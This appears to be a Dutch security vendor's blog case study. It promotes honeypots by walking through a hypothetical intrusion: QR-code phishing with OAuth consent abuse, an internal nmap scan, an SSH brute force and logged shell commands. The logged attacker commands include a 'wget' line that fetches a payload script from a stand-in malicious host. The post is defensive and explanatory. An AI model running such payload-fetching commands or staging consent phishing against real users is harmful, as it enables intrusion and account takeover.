Beveiliging

Waarom een honeypot niet mag ontbreken in je netwerk

Team SH
July 22, 2025
6 reacties
Case Study

Heading

This is some text inside of a div block.
This is some text inside of a div block.
6 Comments

2025-07-22 06:14:55 — Portscan gedetecteerd: 93.184.216.42 → 10.0.5.42:22 (SYN)

TL;DR

Een nieuwe aanvalsketen begon met een QR-code phishing (quishing) campagne die een gebruiker misleidde om met zijn persoonlijke telefoon (BYOD) een kwaadaardige QR-code te scannen. De QR-code leidde naar misbruik van een OAuth-token via een vervalst Microsoft 365 toestemmingsscherm — geen malware, geen gestolen inloggegevens. Met toegang verkregen voerde de aanvaller een port scan uit op het interne bedrijfsnetwerk, die werd gedetecteerd door een honeypot. Daarna volgde een brute-force aanval op SSH, wat uiteindelijk leidde tot interactieve shell-toegang op de honeypot. Elke stap werd in real-time gedetecteerd via integratie met Slack/Teams. Het hele incident — van initiële netwerk toegang tot shell-commando's — was zichtbaar, gelogd en voorzien van tijdstempels voor forensische analyse. Dit onderstreept de kracht van honeypots als goedkope, effectieve detectiemiddelen tegen stille aanvallen die traditionele beveiligingsperimeters omzeilen.

1 | Ingangspunt: QR-Phishing & Token Abuse

Een nieuw type aanval maakt traditionele verdediging bijna blind: een phishingmail met QR-code – ook wel “quishing” genoemd. Stel, een medewerker krijgt een zeer echt lijkende parkeerboete per mail, compleet met QR-code om “direct te betalen”. Geen link om op te klikken dus; alleen een QR. Veel beveiligingsfilters slaan daar niet op aan.

De onfortuinlijke gebruiker scant de code met een persoonlijke telefoon (BYOD). Wat hij niet beseft: de QR-link opent een slim verpakte OAuth-inlogpagina in de browser van zijn mobiel. Via HTML smuggling technieken is de kwaadaardige code verborgen in die pagina – het ziet eruit als een normale Microsoft 365 OAuth-toestemmingsvraag, compleet met logo’s. Omdat dit op de privételefoon gebeurt, merkt de bedrijfsproxy of firewall er niets van. De gebruiker klikt argeloos op “Accept” bij de OAuth-consent. Bingo: de aanvaller krijgt een geldige toegangstoken voor het account, zonder ooit credentials te stelen of malware te hoeven plaatsen.

🔍 Call-out: Je firewall ziet geen camerabeelden. Wat je gebruiker met zijn telefoon scant, komt zelden via jouw netwerk binnen. Met andere woorden: een BYOD plus QR-code betekent blinde vlek voor traditionele network security. Geen enkel Next-Gen-appliance gaat dat zien, want er passeert niets verdachts over de lijn.

In ons scenario heeft de aanvaller via deze truc ineens toegang tot interne resources. Bijvoorbeeld: de OAuth-token geeft toegang tot SharePoint of een mailaccount waar wellicht VPN-gegevens of interne links in staan. De precieze uitwerking kan verschillen, maar het punt staat: zonder dat je IDS/IPS of EDR iets zag, heeft een aanvaller nu een voet tussen de deur in het bedrijfsnetwerk.

2 | Eerste Alarm: Portscan op het Netwerk

Eenmaal binnen verliest de aanvaller geen tijd. Enkele seconden na het compromis voert hij een snelle verkenning uit: een nmap -sS portscan op het interne subnet. Dit is vaak stap één van lateral movement – kijken welke systemen er zijn en welke diensten open staan.

Onze honeypot op IP 10.0.5.42 reageert op deze scanpoging. Hij simuleert dat poort 22 (SSH) en 3306 (MySQL) actieve services zijn en stuurt SYN-ACK’s terug op iedere SYN vanuit de aanvaller. De ingebouwde portscan-detector herkent het patroon en genereert een alarm zodra er meerdere poorten worden aangesproken. Dit resulteert in een automatische notificatie via Slack of Teams.

Je SOC (of IT-team) ziet midden in de nacht ineens een melding oplichten: “Honeypot port scan from 93.184.216.42” (stel dat dat het verdachte IP van de scanner is). Misschien schrikt iemand wakker van de telefoon. Maar belangrijker: er is direct zicht. Iemand (of iets) scant het interne netwerk – en dat zou nooit moeten gebeuren. Dit is het eerste alarm.

Deze vroege detectie is cruciaal. Terwijl traditionele monitoring dit soort interne scans vaak niet of te laat opmerkt (ze genereren niet altijd duidelijke logevents), geldt voor de honeypot: elke scan-pakketje is 100% verdacht. We hebben nu een duidelijke IOC en kunnen meteen reageren, nog vóór er echt iets geraakt is.

3 | Tweede Alarm: Brute Force en Interactie

Een portscan is meestal slechts voorwerk. Kort na de scan probeert de aanvaller in te breken op de interessante machine die hij gevonden heeft – onze honeypot. Snel volgt een brute-force aanval op SSH. Honderden wachtwoorden vliegen ons om de oren in een paar minuten. De honeypot laat dit toe en blijft responsief (specifiek geconfigureerd om niet meteen alles te blokkeren). Dit vergroot de geloofwaardigheid: een echte server die niet in een paar pogingen bezwijkt zou verdacht zijn.

Na een aantal mislukte pogingen laten we bewust één combinatie door. Stel dat de honeypot zo is ingesteld dat admin/welcome1 een geldig account is (klassiek zwak wachtwoord). Zodra de aanvaller daarmee succesvol inlogt, openen we voor hem een interactieve bash-shell. Weer een alarm: “Honeypot SSH login door admin van IP 93.184.216.42” plopt op in Slack/Teams. Nu is duidelijk: iemand heeft daadwerkelijk een systeemaccount bemachtigd en voert commando’s uit.

En dat zien we letterlijk gebeuren. De high-interaction SSH-honeypot logt alle ingevoerde commando’s met timestamp en eventueel output. De aanvaller doet bijvoorbeeld:

  • uname -a (checken welk systeem hij te pakken heeft)
  • cat /etc/hosts (kijken welke hostnamen en IP’s erin staan voor oriëntatie)
  • wget http://malicious.server/payload.sh (proberen een volgende stage binnen te halen)

Deze acties zijn meteen zichtbaar in de live logs. Elke stap wordt real-time doorgestuurd via de webhook. Iemand van de beveiliging die meekijkt in Slack ziet regel voor regel wat de aanvaller doet, alsof je over zijn schouder meekijkt. De honeypot gedraagt zich intussen zoals een echte server: geeft plausibele outputs op uname -a enzovoort, zodat de aanvaller niet argwanend wordt.

4 | Reconstructie: Wat gebeurt wanneer?

Laten we de gebeurtenissen bundelen in een logische volgorde van het incident:

  • Een gebruiker scant de QR-code uit een phishingmail, bijvoorbeeld met een eigen telefoon.
  • Kort daarop voert de aanvaller een portscan uit op het interne netwerk. De honeypot ontvangt SYN-verkeer op poorten 22 (SSH) en 3306 (MySQL), en reageert alsof daar echte services draaien. Dit leidt tot het eerste alarm: een portscan richting de honeypot.
  • Niet lang daarna probeert de aanvaller in te loggen op de honeypot. Een zwak wachtwoord als “welcome1” wordt geaccepteerd, wat direct een tweede alert oplevert.
  • De eerste commando’s worden gelogd: uname, cat /etc/hosts, en andere typische verkenningsacties. Het SOC ziet live dat er activiteit plaatsvindt.
  • Het incident wordt geclassificeerd en er wordt opgeschaald. Het betrokken netwerksegment wordt geïsoleerd om verdere verspreiding te voorkomen.

→ Dit laat zien dat een honeypot waardevolle zichtbaarheid biedt op een binnengedrongen aanvaller. Van de eerste toegang tot interactie met het systeem: elke stap wordt gedetecteerd. In plaats van dat een indringer onopgemerkt blijft, krijg je direct signalen dat er iets mis is – nog voordat er daadwerkelijk schade is aangericht.

5 | Wat heb je eraan? Analyse & Impact

Zo’n incident geeft natuurlijk werk aan de winkel. Maar dankzij de honeypot hebben we uitstekende data voor response en forensisch onderzoek:

  • Export: Alle events en timestamps staan netjes opgeslagen. Je kunt met één klik een CSV-tijdlijn exporteren voor de post-mortem analyse. Handig voor het incidentreport: exact wie/wanneer/wat.
  • Meetbare metrics: Doordat de hele keten gelogd is, kun je achteraf belangrijke tijden en aantallen berekenen:
    • Tijd tussen aanval en detectie: Hoeveel sneller was dit vergeleken met je traditionele detectie? (Misschien had je anders pas na uren/dagen iets door.)
    • Tijd tussen detectie en respons: hoe snel heeft het team gehandeld na de eerste alert?
    • Aantal pogingen en gebruikte credentials: de honeypot logt bijvoorbeeld dat 534 wachtwoorden zijn geprobeerd en welk wachtwoord uiteindelijk werkte. Dit geeft inzicht in de volhardendheid van de aanvaller en of er veelvoorkomende wachtwoorden gebruikt werden.
  • Kostenplaatje: Deze hele detectie werd mogelijk gemaakt door één VM en wat slimme software erop. In tegenstelling tot peperdure NDR-appliances die netwerkverkeer moeten doorspitten, levert deze ene honeypot eerder en preciezer zicht op echte aanvallen. Dwell time van 10+ dagen teruggebracht naar soms wel enkele seconden, voor een fractie van de kosten. Natuurlijk vervangt een honeypot niet al je andere security, maar de prijs/prestatie hiervan is opmerkelijk hoog.

6 | Belangrijkste Inzichten

We vatten de lessen nog eens bondig samen:

  • Firewalls beschermen je niet tegen QR-codes en BYOD-scans. Aanvallen kunnen buiten de traditionele perimeters om plaatsvinden (denk aan privédevices); je hebt daar geen zicht op.
  • EDR detecteert geen token-gebruik; agent-loze aanvallen blijven onzichtbaar. Aanvallers misbruiken cloudtokens of sessiecookies om in te loggen zonder malware te gebruiken. Eenmaal in de cloud of via een niet-gemanaged device heb je geen endpoint-telegraaf meer.
  • Portscan-detectie is een verrassend krachtig en goedkoop waarschuwingsmechanisme. Simpele netwerkverkenning door een aanvaller verraadt zijn aanwezigheid vrijwel meteen als je een honeypot neerzet. Geen fancy AI nodig – een SYN op de juiste plek is voldoende om alarm te slaan.
  • Honeypots kunnen direct gekoppeld worden aan Slack of Teams — geen SIEM vereist. Je krijgt real-time zichtbaarheid zonder eerst grote integratieprojecten. Een webhook inrichten is een kwestie van minuten.
  • High-interaction honeypots leveren verifieerbare, bruikbare logs voor IR-rapportage. Je vangt de daadwerkelijke commands en tactieken van de aanvaller. Deze intel is goud waard voor het Incident Response-team en voor het aanscherpen van je verdediging (je ziet meteen welke gaten ze probeerden te misbruiken).

Het moraal van het verhaal: een honeypot is geen magische muur die aanvallen voorkomt, maar een slimme val waar je de inbreker mee te pakken krijgt zodra hij binnen is. In dit tijdperk van creatieve aanvallen (van QR-phishing tot token theft) is zo’n extra paar ogen binnen je netwerk geen overbodige luxe – het is een goedkope way-out om die ene slip-up snel te ontdekken en de schade te beperken.

Don't Wait for a Cyberattack—Act Now!

Try it for free
Contents
Example H2
Example H3
Example H4

Sign up for our newsletter

Success! Thanks for your submission
Oops! Something went wrong while submitting the form.

Misschien vind je dit ook leuk

CVE-2024-21410 begrijpen: Bescherm je Exchange Server

Lees het artikel

SocGholish Malware: De opkomst van een geavanceerd en ingenieus Gevaar

Beveiliging

Lees het artikel

Verdediging tegen updateaanvallen: waarom we het TUF-raamwerk gebruiken

Beveiliging

Lees het artikel
Bekijk alle blogs
Gain Insights

Don't let hackers fool you. Fool them with our Honeypot.

Try now with our 14-day free trial. Are you able to evade our Honeypot? Easy setup within 15 minutes.

Get started free

Act Now – Secure Your Digital Assets

Sign Up
No thanks
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.